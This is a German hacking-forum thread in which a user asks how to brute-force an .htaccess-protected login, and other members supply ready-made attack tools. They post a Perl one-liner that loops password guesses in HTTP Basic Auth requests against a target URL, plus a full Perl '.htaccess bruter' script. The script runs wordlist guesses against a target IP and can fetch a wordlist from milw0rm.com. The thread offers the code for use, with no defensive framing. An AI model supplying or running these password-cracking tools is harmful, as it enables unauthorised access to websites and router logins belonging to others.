Hey habe Mal ne frage wie kann ich einen htaccess brute forcen ?
Ich will kein User:PW listen usen sondern bruten .
Vielen dank für euere hilfe .
Druckbare Version
Hey habe Mal ne frage wie kann ich einen htaccess brute forcen ?
Ich will kein User:PW listen usen sondern bruten .
Vielen dank für euere hilfe .
Hier hast du ein Ansatz, wie man ein Bruteforcer in Perl schreibt.
Das verbunden mit einem HTTP Request würde dann ein .htaccess Bruteforcer ergeben.
Zitat:
perl -e '$_=a;print$_++,$/while(1);'
Also ich suche ein Prog oder ein script wie ich ein .htaccess brute forcen kann .
Leider kann ich kein perl deshalb suche ich hier nach einer anderen lösung .
Und nach was für eine anderen Lösung suchst du?
oldsch00l johnTheRipper ;D
oder AccessDiver aber sobald ich bruten hoere denn finde ich die chancen immer verschwinden gering ;P ausser der gute Admin 12345 schlägt wieder zu !
mfg n00j
johnTheRipper kenne ich der soll aber nicht gehen hab ich gelesen .
Fertige Scripts oder ProgrammeZitat:
Und nach was für eine anderen Lösung suchst du?
Hier hast du ein fertiges Script.
Das was fett geschrieben ist, sollte man aber noch anpassen.Code:perl -MLWP::UserAgent -e '$a=a;$u=LWP::UserAgent->new;while(1){$r=$u->head("http://username:".$a++."\@url");last,if($r->headers_as_string()!~/.*realm.*/)}$a--;print"pass=$a",$/'
hab mal auf meiner HD bissel gesucht, hier ebenfalls perl
Code:#!/usr/bin/perl
=poc
Simple .htaccess bruteforcer. Could be usefull to crack router logins.
by Perforin
virii.lu
#vxnet
Greetings to everyone from #vxnet and EOF
=cut
use HTTP::Request;
use LWP::UserAgent;
use LWP::Simple;
use File::Temp qw(tempfile);
use strict;
use warnings;
use diagnostics;
my($ip,$user,$dic) = @ARGV;
my($fh, $tmpfile) = tempfile("X" x 23, UNLINK => 1);
my($useragent,$request,$zeile,$_,@data);
if (@ARGV < 3) { help(); }
print <<"INTRO";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.htaccess Bruter by Perforin
virii.lu
#vxnet
~[v1.0]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
INTRO
if ($dic =~ m/--milw0rm/i) {
print "[~] Loading milw0rm wordlist...\n";
getstore('http://milw0rm.com/mil-dic.php',$tmpfile) || die "milw0rm down?!\n";
open(DIC,"<",$tmpfile) || die "Wordlist not found or permission denied!\n";
} else {
open(DIC,"<",$dic) || die "Wordlist not found or permission denied!\n";
}
$useragent = LWP::UserAgent->new;
$request = HTTP::Request->new(GET => 'http://' . $ip);
while(<DIC>) {
chomp($_);
$request->authorization_basic($user, $_);
@data = $useragent->request($request)->as_string;
foreach $zeile (@data) {
if($zeile =~ m/401 Unauthorized/i) {
print "[~] Bruting...\n";
} else {
print "\n[!] Got login!\n";
print "[!] " . $user . ":" . $_ . "\n";
exit;
}
}
}
print "[-] Could not be cracked!\n";
close(DIC);
sub help {
print <<"HELP";
########################################
.htaccess bruter by Perforin
brute.pl 192.168.1.1 admin dic.txt
brute.pl 192.168.1.1 admin --milw0rm
###############[virii.lu]###############
HELP
exit;
}
Ein Wordlist Script ist meiner Meinung nach keine bruteforce Attacke.
Hier wurde aber explizit nach einem gefragt.
Und lieber was eigenes, dann hättest du auch gemerkt das es kei Brutforce ist.
Milw0rm ist doch auch down oder irre ich ?
wenn ich richtig liege, dann wird das script von jakuza112 nicht gehen
da es doch versucht auf milw0rms wordlist zuzugreifen ?